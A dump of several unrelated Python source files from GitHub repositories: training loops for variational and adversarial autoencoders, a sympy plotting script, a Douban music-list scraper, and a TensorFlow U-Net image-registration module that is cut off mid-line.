test_epoch_ae_loss_avg(test_ae_loss)\n test_epoch_dc_loss_avg(test_dc_loss)\n test_epoch_dc_acc_avg(test_dc_acc)\n epoch_time = time.time() - start\n print('done')\n print('{:4d}: TIME: {:.2f} ETA: {:.2f} TRAIN_LOSS: {:.4f} TEST_LOSS: {:.4f}' \\\n .format(epoch, epoch_time,\n epoch_time * (n_epochs - epoch),\n train_epoch_dc_acc_avg.result(),\n test_epoch_dc_acc_avg.result()))\n if epoch == 0:\n losses[epoch, 0] = train_epoch_ae_loss_avg.result()\n losses[epoch, 1] = train_epoch_dc_loss_avg.result()\n losses[epoch, 2] = train_epoch_dc_acc_avg.result()\n losses[epoch, 3] = test_epoch_ae_loss_avg.result()\n losses[epoch, 4] = test_epoch_dc_loss_avg.result()\n losses[epoch, 5] = test_epoch_dc_acc_avg.result()\n else:\n temp_loss = np.zeros((1, 6))\n temp_loss[0, 0] = train_epoch_ae_loss_avg.result()\n temp_loss[0, 1] = train_epoch_dc_loss_avg.result()\n temp_loss[0, 2] = train_epoch_dc_acc_avg.result()\n temp_loss[0, 3] = test_epoch_ae_loss_avg.result()\n temp_loss[0, 4] = test_epoch_dc_loss_avg.result()\n temp_loss[0, 5] = test_epoch_dc_acc_avg.result()\n losses = np.concatenate((losses, temp_loss))\n\n # self.ae_optimizer.lr.assign(base_lr)\n if epoch>60 and LRonPlat==True:\n if (losses[epoch,3]-np.mean(losses[epoch-50:epoch,3]))<0:\n base_lr = base_lr*0.2\n self.ae_optimizer.lr.assign(base_lr)\n if epoch>1000 and early_stopping==True:\n if (losses[epoch,3]-np.mean(losses[epoch-50:epoch,3]))<0:\n break\n gc.collect()\n clear_session()\n compat.v1.reset_default_graph()\n self.losses = losses\n else:\n self.full_model = VSM(self.front_model,self.back_model)\n print(resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)\n print('compiling')\n self.full_model.compile(optimizer =optimizer)\n print(resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)\n print('compiled')\n self.history = self.full_model.fit(training_x,training_y, epochs=epochs, batch_size=training_x.shape[0], shuffle=True,\n validation_data=(test_x, test_y), verbose=2, callbacks=callbacks)\n elif self.type == 'Adversarial':\n base_lr = 0.00025\n if optimizer == 'Adam':\n self.ae_optimizer = tf.keras.optimizers.Adam(lr=base_lr)\n elif optimizer == 'Nadam':\n self.ae_optimizer = tf.keras.optimizers.Nadam(lr=base_lr)\n if optimizer == 'Adam':\n self.dc_optimizer = tf.keras.optimizers.Adam(lr=base_lr)\n elif optimizer == 'Nadam':\n self.dc_optimizer = tf.keras.optimizers.Nadam(lr=base_lr)\n if optimizer == 'Adam':\n self.gen_optimizer = tf.keras.optimizers.Adam(lr=base_lr)\n elif optimizer == 'Nadam':\n self.gen_optimizer = tf.keras.optimizers.Nadam(lr=base_lr)\n # Training loop\n n_epochs = epochs\n losses = np.zeros((1,8))\n base_lr = 0.00025\n max_lr = 0.00025\n n_samples = training_x.shape[0]\n step_size = 2 * np.ceil(n_samples / batch_size)\n global_step = 0\n if custom_training == True:\n for epoch in range(n_epochs):\n print(resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)\n start = time.time()\n train_epoch_ae_loss_avg = tf.metrics.Mean()\n train_epoch_dc_loss_avg = tf.metrics.Mean()\n train_epoch_dc_acc_avg = tf.metrics.Mean()\n train_epoch_gen_loss_avg = tf.metrics.Mean()\n test_epoch_ae_loss_avg = tf.metrics.Mean()\n test_epoch_dc_loss_avg = tf.metrics.Mean()\n test_epoch_dc_acc_avg = tf.metrics.Mean()\n test_epoch_gen_loss_avg = tf.metrics.Mean()\n batch_num = int(training_x.shape[0] / batch_size)\n if shuffle_data == True:\n training_x,training_y = shuffle(training_x,training_y)\n for j1 in range(batch_num):\n # -------------------------------------------------------------------------------------------------------------\n batch_x = training_x[batch_size * j1:batch_size * (j1 + 1), :]\n batch_y = training_y[batch_size * j1:batch_size * (j1 + 1), :]\n global_step = global_step + 1\n cycle = np.floor(1 + global_step / (2 * step_size))\n x_lr = np.abs(global_step / step_size - 2 * cycle + 1)\n clr = base_lr + (max_lr - base_lr) * max(0, 1 - x_lr)\n try:\n self.ae_optimizer.lr = clr\n self.dc_optimizer.lr = clr\n self.gen_optimizer.lr = clr\n except:\n None\n ae_loss, dc_loss, dc_acc, gen_loss = self.train_step_adv(batch_x, batch_y = batch_y)\n\n train_epoch_ae_loss_avg(ae_loss)\n train_epoch_dc_loss_avg(dc_loss)\n train_epoch_dc_acc_avg(dc_acc)\n train_epoch_gen_loss_avg(gen_loss)\n batch_num = int(test_x.shape[0] / batch_size)\n if shuffle_data == True:\n test_x,test_y = shuffle(test_x,test_y)\n for j1 in range(batch_num):\n batch_x = test_x[batch_size * j1:batch_size * (j1 + 1), :]\n batch_y = test_y[batch_size * j1:batch_size * (j1 + 1), :]\n ae_loss, dc_loss, dc_acc, gen_loss = self.train_step_adv(batch_x, batch_y=batch_y, training=False)\n\n test_epoch_ae_loss_avg(ae_loss)\n test_epoch_dc_loss_avg(dc_loss)\n test_epoch_dc_acc_avg(dc_acc)\n test_epoch_gen_loss_avg(gen_loss)\n epoch_time = time.time() - start\n print('{:4d}: TIME: {:.2f} ETA: {:.2f} AE_TRAIN_LOSS: {:.4f} DC_TRAIN_LOSS: {:.4f} GEN_TRAIN_LOSS: {:.4f} AE_TEST_LOSS: {:.4f} DC_TEST_LOSS: {:.4f} GEN_TEST_LOSS: {:.4f}' \\\n .format(epoch, epoch_time,\n epoch_time * (n_epochs - epoch),\n train_epoch_ae_loss_avg.result(),\n train_epoch_dc_loss_avg.result(),\n train_epoch_gen_loss_avg.result(),\n test_epoch_ae_loss_avg.result(),\n test_epoch_dc_loss_avg.result(),\n test_epoch_gen_loss_avg.result()))\n if epoch == 0:\n losses[epoch, 0] = train_epoch_ae_loss_avg.result()\n losses[epoch, 1] = train_epoch_dc_loss_avg.result()\n losses[epoch, 2] = train_epoch_dc_acc_avg.result()\n losses[epoch, 3] = train_epoch_gen_loss_avg.result()\n losses[epoch, 4] = test_epoch_ae_loss_avg.result()\n losses[epoch, 5] = test_epoch_dc_loss_avg.result()\n losses[epoch, 6] = test_epoch_dc_acc_avg.result()\n losses[epoch, 7] = test_epoch_gen_loss_avg.result()\n else:\n temp_loss = np.zeros((1,8))\n temp_loss[0, 0] = train_epoch_ae_loss_avg.result()\n temp_loss[0, 1] = train_epoch_dc_loss_avg.result()\n temp_loss[0, 2] = train_epoch_dc_acc_avg.result()\n temp_loss[0, 3] = train_epoch_gen_loss_avg.result()\n temp_loss[0, 4] = test_epoch_ae_loss_avg.result()\n temp_loss[0, 5] = test_epoch_dc_loss_avg.result()\n temp_loss[0, 6] = test_epoch_dc_acc_avg.result()\n temp_loss[0, 7] = test_epoch_gen_loss_avg.result()\n losses = np.concatenate((losses,temp_loss))\n if epoch > 20 and LRonPlat==True:\n if (losses[epoch, 4] - np.mean(losses[epoch - 20:epoch, 4])) < 0:\n base_lr = base_lr * 0.2\n self.ae_optimizer.lr.assign(base_lr)\n self.gen_optimizer.lr.assign(base_lr)\n self.dc_optimizer.lr.assign(base_lr)\n if epoch > 1000 and early_stopping == True:\n if (losses[epoch, 4] - np.mean(losses[epoch - 50:epoch, 4])) < 0:\n break\n gc.collect()\n clear_session()\n compat.v1.reset_default_graph()\n self.losses = losses\n else:\n losses = np.zeros((1, 6))\n self.disc.compile(loss='binary_crossentropy',optimizer = self.dc_optimizer)\n self.disc.trainable=False\n Adv_input = Input(shape=(self.input_size))\n encoded_output=self.front_model(Adv_input)\n decoder_output=self.back_model(encoded_output)\n valdity = self.disc(encoded_output)\n adv_net = Model(Adv_input,[decoder_output,valdity],name='Adv_net')\n adv_net.compile(loss=['mse', 'binary_crossentropy'], loss_weights=[0.999, 0.01], optimizer=self.ae_optimizer)\n for epoch in range(n_epochs):\n start = time.time()\n\n batch_num = int(training_x.shape[0] / batch_size)\n if shuffle_data == True:\n training_x, training_y = shuffle(training_x, training_y)\n for j1 in range(batch_num):\n batch_x = training_x[batch_size * j1:batch_size * (j1 + 1), :]\n batch_y = training_y[batch_size * j1:batch_size * (j1 + 1), :]\n real_distribution = tf.random.normal([batch_x.shape[0], self.nlatent], mean=0.0, stddev=1.0)\n real = np.ones(batch_x.shape[0])\n fake = np.zeros(batch_x.shape[0])\n latent_fake = self.front_model.predict(batch_x)\n g_train_loss = adv_net.train_on_batch(batch_x, [batch_y, real])\n print('done')\n print(str(g_train_loss))\n batch_num = int(test_x.shape[0] / batch_size)\n if shuffle_data == True:\n test_x, test_y = shuffle(test_x, test_y)\n for j1 in range(batch_num):\n batch_x = test_x[batch_size * j1:batch_size * (j1 + 1), :]\n batch_y = test_y[batch_size * j1:batch_size * (j1 + 1), :]\n g_test_loss = adv_net.test_on_batch(batch_x, [batch_y, real])\n if epoch == 0:\n losses[epoch,:3] = g_train_loss[:]\n losses[epoch, 3:] = g_test_loss[:]\n\n else:\n temp_loss = np.zeros((1, 6))\n temp_loss[0,:3] = g_train_loss[:]\n temp_loss[0, 3:] = g_test_loss[:]\n losses = np.concatenate((losses, temp_loss))\n gc.collect()\n clear_session()\n compat.v1.reset_default_graph()\n self.losses=losses\n\n\n else:\n if custom_training==True:\n base_lr = 0.00025\n if optimizer == 'Adam':\n self.ae_optimizer = tf.keras.optimizers.Adam(lr=base_lr)\n elif optimizer == 'Nadam':\n self.ae_optimizer = tf.keras.optimizers.Nadam(lr=base_lr)\n # Training loop\n n_epochs = epochs\n losses = np.zeros((1, 2))\n max_lr = 0.00025\n n_samples = training_x.shape[0]\n step_size = 2 * np.ceil(n_samples / batch_size)\n global_step = 0\n for epoch in range(n_epochs):\n print(resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)\n start = time.time()\n train_epoch_ae_loss_avg = tf.metrics.Mean()\n test_epoch_ae_loss_avg = tf.metrics.Mean()\n batch_num = int(training_x.shape[0] / batch_size)\n if shuffle_data == True:\n training_x,training_y = shuffle(training_x,training_y)\n for j1 in range(batch_num):\n # -------------------------------------------------------------------------------------------------------------\n batch_x = training_x[batch_size * j1:batch_size * (j1 + 1), :]\n batch_y = training_y[batch_size * j1:batch_size * (j1 + 1), :]\n global_step = global_step + 1\n cycle = np.floor(1 + global_step / (2 * step_size))\n x_lr = np.abs(global_step / step_size - 2 * cycle + 1)\n clr = base_lr + (max_lr - base_lr) * max(0, 1 - x_lr)\n try:\n self.ae_optimizer.lr = clr\n\n except:\n None\n ae_loss = self.train_step_norm(batch_x, batch_y=batch_y)\n\n train_epoch_ae_loss_avg(ae_loss)\n batch_num = int(test_x.shape[0] / batch_size)\n if shuffle_data == True:\n test_x,test_y = shuffle(test_x,test_y)\n for j1 in range(batch_num):\n # -------------------------------------------------------------------------------------------------------------\n batch_x = test_x[batch_size * j1:batch_size * (j1 + 1), :]\n batch_y = test_y[batch_size * j1:batch_size * (j1 + 1), :]\n ae_loss = self.train_step_norm(batch_x, batch_y=batch_y, training=False)\n\n test_epoch_ae_loss_avg(ae_loss)\n epoch_time = time.time() - start\n print('{:4d}: TIME: {:.2f} ETA: {:.2f} MSE_TRAIN_LOSS: {:.4f} MSE_TEST_LOSS: {:.4f}' \\\n .format(epoch, epoch_time,\n epoch_time * (n_epochs - epoch),\n train_epoch_ae_loss_avg.result(),\n test_epoch_ae_loss_avg.result()))\n if epoch == 0:\n losses[epoch, 0] = train_epoch_ae_loss_avg.result()\n losses[epoch, 1] = test_epoch_ae_loss_avg.result()\n else:\n temp_loss = np.zeros((1, 2))\n temp_loss[0, 0] = train_epoch_ae_loss_avg.result()\n temp_loss[0, 1] = test_epoch_ae_loss_avg.result()\n losses = np.concatenate((losses, temp_loss))\n if epoch > 60 and LRonPlat==True:\n if (losses[epoch, 0] - np.mean(losses[epoch - 50:epoch, 0])) > 0:\n base_lr = base_lr * 0.2\n self.ae_optimizer.lr.assign(base_lr)\n if epoch > 500 and early_stopping == True:\n if (losses[epoch, 1] - np.mean(losses[epoch - 50:epoch, 1])) > 0:\n break\n gc.collect()\n clear_session()\n compat.v1.reset_default_graph()\n self.losses = losses\n else:\n self.full_model.compile(optimizer, loss)\n self.history = self.full_model.fit(training_x,training_y, epochs=epochs, batch_size=batch_size, shuffle=True,\n validation_data=(test_x, test_y), verbose=2, callbacks=callbacks)\n\n try:\n plt.yscale('log')\n plt.plot(self.history.history['loss'])\n plt.plot(self.history.history['val_loss'])\n plt.savefig(save_location + 'losses.png')\n except:\n try:\n plt.yscale('log')\n if self.type=='Adversarial':\n plt.plot(self.losses[:, 0])\n plt.plot(self.losses[:, 4])\n elif self.type=='Variational':\n plt.plot(self.losses[:, 0])\n plt.plot(self.losses[:, 3])\n else:\n plt.plot(self.losses[:, 0])\n plt.plot(self.losses[:, 1])\n plt.savefig(save_location + 'losses.png')\n except:\n print('could not plot losses')\n\n if save_full_model == True:\n try:\n self.full_model.save(save_location + 'full.h5')\n except:\n print('could not save full model')\n if (self.real_layer == 'Adversarial') or (self.real_layer == 'Variational'):\n self.front_model.save(save_location + 'front.h5')\n self.back_model.save(save_location + 'back.h5')\n else:\n if (self.real_layer == 'Adversarial') or (self.real_layer == 'Variational'):\n self.front_model.save_weights(save_location + 'front.h5')\n self.back_model.save_weights(save_location + 'back.h5')\n try:\n self.full_model.save_weights(save_location + 'full.h5')\n except:\n print('could not save full model')\n #loads previously trained model, if load_full_model = False loads just the weights (needs to have called create_architecture)\n def load_model(self,load_full_model=True,save_location='model'):\n if load_full_model == True:\n try:\n if self.real_layer == 'Adversarial':\n self.front_model =tensorflow.keras.models.load_model(save_location + 'front.h5')\n self.back_model =tensorflow.keras.models.load_model(save_location + 'back.h5')\n Adv_input = Input(shape=(self.input_size))\n encoder_ouputs = self.front_model(Adv_input)\n decoder_ouputs = self.back_model(encoder_ouputs)\n self.full_model = Model(Adv_input, decoder_ouputs)\n elif self.real_layer == 'Variational':\n self.full_model =tensorflow.keras.models.load_model(save_location + '.h5')\n except:\n self.full_model = tensorflow.keras.models.load_model(save_location + 'full.h5')\n elif load_full_model == False:\n if self.real_layer == 'Adversarial':\n # self.full_model.load_weights(save_location + '.h5')\n self.front_model.load_weights(save_location + 'front.h5', by_name = True)\n self.back_model.load_weights(save_location + 'back.h5', by_name = True)\n Adv_input = Input(shape=(self.input_size))\n encoder_ouputs = self.front_model(Adv_input)\n decoder_ouputs = self.back_model(encoder_ouputs)\n self.full_model = Model(Adv_input, decoder_ouputs)\n elif self.real_layer == 'Variational':\n self.front_model.load_weights(save_location + 'front.h5')\n self.back_model.load_weights(save_location + 'back.h5')\n Adv_input = Input(shape=(self.input_size))\n encoder_ouputs = self.front_model(Adv_input)[2]\n decoder_ouputs = self.back_model(encoder_ouputs)\n self.full_model = Model(Adv_input, decoder_ouputs)\n else:\n self.full_model.load_weights(save_location + 'full.h5')\n # self.full_model.load_weights(save_location + '.h5')\n\n#Alternative Variational class for training\nclass VSM(tensorflow.keras.Model):\n def __init__(self, encoder, decoder, **kwargs):\n super(VSM, self).__init__(**kwargs)\n self.encoder = encoder\n self.decoder = decoder\n self.total_loss_tracker =tensorflow.keras.metrics.Mean(name=\"total_loss\")\n self.reconstruction_loss_tracker =tensorflow.keras.metrics.Mean(\n name=\"reconstruction_loss\"\n )\n self.kl_loss_tracker =tensorflow.keras.metrics.Mean(name=\"kl_loss\")\n\n @property\n def metrics(self):\n return [\n self.total_loss_tracker,\n self.reconstruction_loss_tracker,\n self.kl_loss_tracker,\n ]\n def call(self, x):\n None\n def train_step(self, data):\n x, y = data\n with tf.GradientTape() as tape:\n z_mean, z_log_var, z = self.encoder(x)\n reconstruction = self.decoder(z)\n reconstruction = K.flatten(reconstruction)\n y_flatten = K.flatten(y)\n reconstruction_loss = mse(y_flatten, reconstruction)\n kl_loss = -5e-4 * K.mean(1 + z_log_var - K.square(z_mean) - K.exp(z_log_var), axis=-1)\n total_loss = K.mean(reconstruction_loss + kl_loss)\n grads = tape.gradient(total_loss, self.trainable_weights)\n self.optimizer.apply_gradients(zip(grads, self.trainable_weights))\n self.total_loss_tracker.update_state(total_loss)\n self.reconstruction_loss_tracker.update_state(reconstruction_loss)\n self.kl_loss_tracker.update_state(kl_loss)\n gc.collect()\n # clear_session()\n return {\n \"loss\": self.total_loss_tracker.result(),\n \"reconstruction_loss\": self.reconstruction_loss_tracker.result(),\n \"kl_loss\": self.kl_loss_tracker.result(),\n }\n def test_step(self, data):\n x, y = data\n with tf.GradientTape() as tape:\n z_mean, z_log_var, z = self.encoder(x, training=False)\n reconstruction = self.decoder(z, training=False)\n reconstruction = K.flatten(reconstruction)\n y_flatten = K.flatten(y)\n reconstruction_loss = mse(y_flatten, reconstruction)\n kl_loss = -5e-4 * K.mean(1 + z_log_var - K.square(z_mean) - K.exp(z_log_var), axis=-1)\n total_loss = K.mean(reconstruction_loss + kl_loss)\n # grads = tape.gradient(total_loss, self.trainable_weights)\n # self.optimizer.apply_gradients(zip(grads, self.trainable_weights))\n self.total_loss_tracker.update_state(total_loss)\n self.reconstruction_loss_tracker.update_state(reconstruction_loss)\n self.kl_loss_tracker.update_state(kl_loss)\n return {\n \"loss\": self.total_loss_tracker.result(),\n \"reconstruction_loss\": self.reconstruction_loss_tracker.result(),\n \"kl_loss\": self.kl_loss_tracker.result(),\n }\n\n","repo_name":"edsml-sz1222/test","sub_path":"surrogate_model.py","file_name":"surrogate_model.py","file_ext":"py","file_size_in_byte":48781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6572526398","text":"import numpy as np\nfrom mpmath import *\nfrom sympy import * \nfrom sympy import E, Eq, Function, pde_separate, Derivative as D, Q\nfrom sympy.vector import CoordSys3D\nfrom sympy.vector import CoordSys3D,matrix_to_vector,curl,gradient,divergence,Del,Divergence,Gradient, laplacian,Curl\nimport matplotlib.pyplot as plt\nfrom sympy.parsing.sympy_parser import parse_expr\n\n\nC = CoordSys3D('C')\ninit_printing()\nU0,omega,qRe,chi,qRo,BOx,qAl,BOz,qRm,qFr,Ri,zeta,Dist,e = symbols(\"U0,omega,qRe,chi,qRo,BOx,qAl,BOz,qRm,qFr,Ri,zeta,Dist,e\")\nx = C.x\ny = C.y\nz = C.z\n\n\nfil = open(\"./sol_topo\",\"r\")\nfi = fil.read()\nfil.close()\nind = fi.find(\"Matrix\")\nMat = fi[ind:]\nexec(\"solfull =\" + Mat)\ndic = fi[:ind]\nexec(\"dic =\" + dic)\nzet = np.float(dic[zeta])\nprint(dic)\n\n\nff = lambdify([x,z],solfull.xreplace({y:0}),'numpy')\nxn = np.linspace(-2*np.pi,2*np.pi,200)\nyn = np.linspace(0,-1,200)\nxqui = xn[::6]\nyqui = yn[::6]\nXqui,Yqui = np.meshgrid(xqui,yqui)\nX,Y = np.meshgrid(xn,yn)\n\ndisp = 0\nprint(ff(2,0))\nvar = [\"ux\",\"uy\",\"uz\",\"p\",\"bx\",\"by\",\"bz\"]\nplt.figure(figsize=(15,8))\nplt.plot(xn,np.real(zet*np.exp(1j*xn)),'k')\n#plt.plot(xn,np.real(zet*np.exp(1j*xn))-1,'k')\nplt.contourf(X,Y,np.real(ff(X,Y))[disp][0],200,cmap = \"viridis\",zorder=1)\nplt.colorbar()\n#plt.streamplot(X,Y,np.real(ff(X,Y)[0][0]),np.real(ff(X,Y)[2][0]),color = \"k\",linewidth = 0.5, density = 4,arrowsize = 0.5,maxlength = 6)\nplt.quiver(Xqui,Yqui,np.real(ff(Xqui,Yqui)[0][0]),np.real(ff(Xqui,Yqui)[2][0]),zorder=2)\nplt.show()\n","repo_name":"monvilre/ToCCo","sub_path":"topo_plot_example.py","file_name":"topo_plot_example.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1500582349","text":"import sys\nimport requests\nimport os\nfrom typing import List\n\nfrom datetime import datetime\nfrom bs4 import BeautifulSoup\nimport xlwings as xw\nimport xlsxwriter\n\nfrom douban_exporter_lite.douban_exporter import DoubanExporter\nfrom douban_exporter_lite.misc import HEADERS\n\n\nclass MusicSheet(DoubanExporter):\n def __init__(self, user_id):\n super().__init__(user_id)\n self.category = \"music\"\n self.file_name = (\n f\"{self.user_id}_{self.category}_{datetime.now().strftime('%Y-%m-%d')}.xlsx\"\n )\n\n def initial_sheet(self, sheet_type, workbook, global_format, heading_format):\n sheet = workbook.add_worksheet(self.map_chinese_sheet_name(sheet_type))\n\n if sheet_type == \"collect\" or sheet_type == \"do\":\n sheet.set_column(0, 1, 30, global_format)\n sheet.set_column(2, 3, 20, global_format)\n sheet.set_column(4, 4, 10, global_format)\n sheet.set_column(5, 5, 50, global_format)\n sheet.set_column(6, 6, 30, global_format)\n sheet_header = [\"专辑名\", \"表演者\", \"发行日期\", \"标记日期\", \"我的评分\", \"我的评语\", \"Tags\"]\n else:\n sheet.set_column(0, 1, 30, global_format)\n sheet.set_column(2, 3, 20, global_format)\n sheet.set_column(4, 4, 50, global_format)\n sheet.set_column(5, 5, 30, global_format)\n sheet_header = [\"专辑名\", \"表演者\", \"发行日期\", \"标记日期\", \"我的评语\", \"Tags\"]\n\n for col, item in enumerate(sheet_header):\n sheet.write(0, col, item, heading_format)\n\n def export(self, url: str) -> List[str]:\n infos = []\n info_keys = [\n \"title\",\n \"artist\",\n \"release_date\",\n \"mark_date\",\n \"rating\",\n \"comment\",\n \"tags\",\n \"douban_link\",\n ]\n r = requests.get(url, headers=HEADERS)\n soup = BeautifulSoup(r.text, \"lxml\")\n\n album_items = soup.find_all(\"div\", {\"class\": \"item\"})\n if len(album_items) > 0:\n for item in album_items:\n info_dict = dict.fromkeys(info_keys)\n # meta data\n info_dict[\"douban_link\"] = item.a[\"href\"]\n info_dict[\"title\"] = item.find(\"li\", {\"class\": \"title\"}).em.text\n try:\n info_dict[\"artist\"] = str(\n item.find(\"li\", {\"class\": \"intro\"}).text\n ).split(\" / \")[0]\n except:\n pass\n\n try:\n info_dict[\"release_date\"] = str(\n item.find(\"li\", {\"class\": \"intro\"}).text\n ).split(\" / \")[1]\n except:\n pass\n\n # user data\n # .contents[0] = .text\n info_dict[\"mark_date\"] = item.find(\"span\", {\"class\": \"date\"}).text\n\n try:\n info_dict[\"rating\"] = DoubanExporter.get_rating(\n item.find(\"span\", class_=lambda x: x != \"date\")[\"class\"][0]\n )\n except:\n pass\n\n try:\n info_dict[\"comment\"] = item.find_all(\"li\")[3].contents[0].strip()\n except IndexError:\n pass\n\n tags = item.find(\"span\", {\"class\": \"tags\"})\n if tags:\n info_dict[\"tags\"] = tags.text[3:].strip()\n\n infos.append([info_dict[key] for key in info_keys])\n else:\n return None\n return infos\n\n\nif __name__ == \"__main__\":\n new_task = MusicSheet(sys.argv[1])\n new_task.start_task()\n","repo_name":"IvanWoo/douban-exporter-lite","sub_path":"douban_exporter_lite/douban_music.py","file_name":"douban_music.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"3580474366","text":"# *** This code is with an Apache 2.0 license, University College London ***\n# The 2D registration network is a modified U-Net: https://www.tensorflow.org/tutorials/images/segmentation\n# Part of the network is adapted from TensorFlow Examples (https://github.com/tensorflow/examples), which needs to be installed first.\n\nimport tensorflow as tf\nfrom tensorflow_examples.models.pix2pix import pix2pix\n\n### network and layers\nclass UNet(tf.keras.Model):\n def __init__(self, out_channels, num_channels_initial):\n super(UNet, self).__init__()\n # the encoder/downsampler is a series of downsample blocks implemented in TensorFlow examples.\n self.down_stack = [\n pix2pix.downsample(num_channels_initial, 3, norm_type='instancenorm'), \n pix2pix.downsample(num_channels_initial*2, 3, norm_type='instancenorm'),\n pix2pix.downsample(num_channels_initial*4, 3, norm_type='instancenorm')\n ]\n # The decoder/upsampler is a series of upsample blocks implemented in TensorFlow examples.\n self.up_stack = [\n pix2pix.upsample(num_channels_initial*4, 3, norm_type='instancenorm'),\n pix2pix.upsample(num_channels_initial*2, 3, norm_type='instancenorm'), \n pix2pix.upsample(num_channels_initial, 3, norm_type='instancenorm'),\n ]\n self.out_layer = tf.keras.layers.Conv2DTranspose(out_channels, 3, strides=2, padding='same', activation=None, use_bias=True)\n\n def call(self, inputs):\n x = inputs\n # Downsampling through the model\n skips = []\n for down in self.down_stack[:-1]:\n x = down(x)\n skips += [x]\n x = self.down_stack[-1](x)\n # Upsampling and establishing the skip connections\n for up, skip in zip(self.up_stack, reversed(skips)):\n x = up(x)\n x = tf.concat([x, skip],axis=3) # concat = tf.keras.layers.Concatenate()\n return self.out_layer(x)\n\n def build(self, input_shape):\n inputs = tf.keras.layers.Input(shape=input_shape)\n return tf.keras.Model(inputs=inputs, outputs=self.call(inputs))\n\n\n### transformation utility functions\ndef get_reference_grid(grid_size):\n # grid_size: [batch_size, height, width]\n grid = tf.cast(tf.stack(tf.meshgrid(\n tf.range(grid_size[1]),\n tf.range(grid_size[2]),\n indexing='ij'), axis=2), dtype=tf.float32)\n return tf.tile(tf.expand_dims(grid, axis=0), [grid_size[0],1,1,1])\n\n\ndef warp_images(images, ddfs):\n # images: [batch_size, height, width]\n # ddfs: [batch_size, height, width, 2]\n reference_grid = get_reference_grid(ddfs.shape[0:3])\n warped_grids = reference_grid + ddfs\n return bilinear_resampler(images, warped_grids)\n\n\ndef bilinear_resampler(grid_data, sample_grids):\n '''\n grid_data: [batch, height, width]\n sample_grids: [batch, height, width, 2] \n '''\n batch_size, height, width = (grid_data.shape[:])\n sample_coords = tf.reshape(sample_grids, [batch_size,-1,2])\n # pad to replicate the boundaries 1-ceiling, 2-floor\n sample_coords = tf.stack([tf.clip_by_value(sample_coords[...,0],0,height-1),\n tf.clip_by_value(sample_coords[...,1],0,width-1)], axis=2)\n i1 = tf.cast(tf.math.ceil(sample_coords[...,0]), dtype=tf.int32)\n j1 = tf.cast(tf.math.ceil(sample_coords[...,1]), dtype=tf.int32)\n i0 = tf.maximum(i1-1, 0)\n j0 = tf.maximum(j1-1, 0)\n # four data points q_ij\n q00 = tf.gather_nd(grid_data, tf.stack([i0,j0],axis=2), batch_dims=1)\n q01 = tf.gather_nd(grid_data, tf.stack([i0,j1],axis=2), batch_dims=1)\n q11 = tf.gather_nd(grid_data, tf.stack([i1,j1],axis=2), batch_dims=1)\n q10 = tf.gather_nd(grid_data, tf.stack([i1,j0],axis=2), batch_dims=1) \n # weights with normalised local coordinates\n wi1 = sample_coords[...,0] - tf.cast(i0,dtype=tf.float32)\n wi0 = 1 - wi1\n wj1 = sample_coords[...,1] - tf.cast(j0,dtype=tf.float32)\n wj0 = 1 - wj1\n return tf.reshape(q00*wi0*wj0 + q01*wi0*wj1 + q11*wi1*wj1 + q10*wi1*wj0, [batch_size]+sample_grids.shape[1:3])\n\n\n\n'''\ndef warp_grids(grid, transform):\n # grid: [batch, height, width, 2]\n # transform: [batch, 3, 3]\n batch_size, height, width = grid.shape[0:3]\n grid = tf.concat([tf.reshape(grid,[batch_size,height*width,2]), \n tf.ones([batch_size,height*width,1])], axis=2)\n grid_warped = tf.matmul(grid, transform)\n return tf.reshape(grid_warped[...,:2], [batch_size,height,width,2])\n\n\ndef random_transform_generator(batch_size, corner_scale=.1):\n # right-multiplication affine\n ori_corners = tf.tile([[[1.,1.], [1.,-1.], [-1.,1.], [-1.,-1.]]], [batch_size,1,1])\n new_corners = ori_corners + tf.random.uniform([batch_size,4,2], -corner_scale, corner_scale) \n ori_corners = tf.concat([ori_corners,tf.ones([batch_size,4,1])], axis=2)\n new_corners = tf.concat([new_corners,tf.ones([batch_size,4,1])], axis=2)\n return tf.stack([tf.linalg.lstsq(ori_corners[n],new_corners[n]) for n in range(batch_size)], axis=0)\n\n\ndef random_image_transform(images):\n # images: [batch_size, height, width]\n reference_grid = get_reference_grid(images.shape[0:3])\n random_transform = random_transform_generator(images.shape[0], corner_scale=0.1)\n sample_grids = warp_grids(reference_grid, random_transform)\n return bilinear_resampler(images, sample_grids)\n'''\n\n### loss functions\ndef square_difference(i1, i2):\n return tf.reduce_mean(tf.square(i1 - i2), axis=[1, 2]) # use mean for normalised regulariser weighting\n\n\ndef gradient_dx(fv):\n return (fv[:, 2:, 1:-1] - fv[:, :-2, 1:-1]) / 2\n\n\ndef gradient_dy(fv):\n return (fv[:, 1:-1, 2:] - fv[:, 1:-1, :-2]) / 2\n\n\ndef gradient_txy(txy, fn):\n return tf.stack([fn(txy[..., i]) for i in [0, 1]], axis=3)\n\n\ndef gradient_norm(displacement, flag_l1=False):\n dtdx = gradient_txy(displacement, gradient_dx)\n dtdy = gradient_txy(displacement, gradient_dy)\n if flag_l1:\n norms = tf.abs(dtdx) + tf.abs(dtdy)\n else:\n norms = dtdx**2 + dtdy**2\n return tf.reduce_mean(norms, [1, 2, 3])\n\n\n'''\ndef bending_energy(displacement):\n dtdx = gradient_txy(displacement, gradient_dx)\n dtdy = gradient_txy(displacement, gradient_dy)\n dtdxx = gradient_txy(dtdx, gradient_dx)\n dtdyy = gradient_txy(dtdy, gradient_dy)\n dtdxy = gradient_txy(dtdx, gradient_dy)\n return tf.reduce_mean(dtdxx**2 + dtdyy**2 + 2*dtdxy**2, [1, 2, 3])\n\n\ndef normalised_cross_correlation(ts, ps, eps=0.0):\n dp = ps - tf.reduce_mean(ps, axis=[1, 2, 3])\n dt = ts - tf.reduce_mean(ts, axis=[1, 2, 3])\n vp = tf.reduce_sum(tf.square(dp), axis=[1, 2, 3])\n vt = tf.reduce_sum(tf.square(dt), axis=[1, 2, 3])\n return tf.constant(1.0) - tf.reduce_sum(dp*dt / (tf.sqrt(vp*vt) + eps), axis=[1, 2, 3])\n\n\ndef normalised_cross_correlation2(ts, ps, eps=1e-6):\n mean_t = tf.reduce_mean(ts, 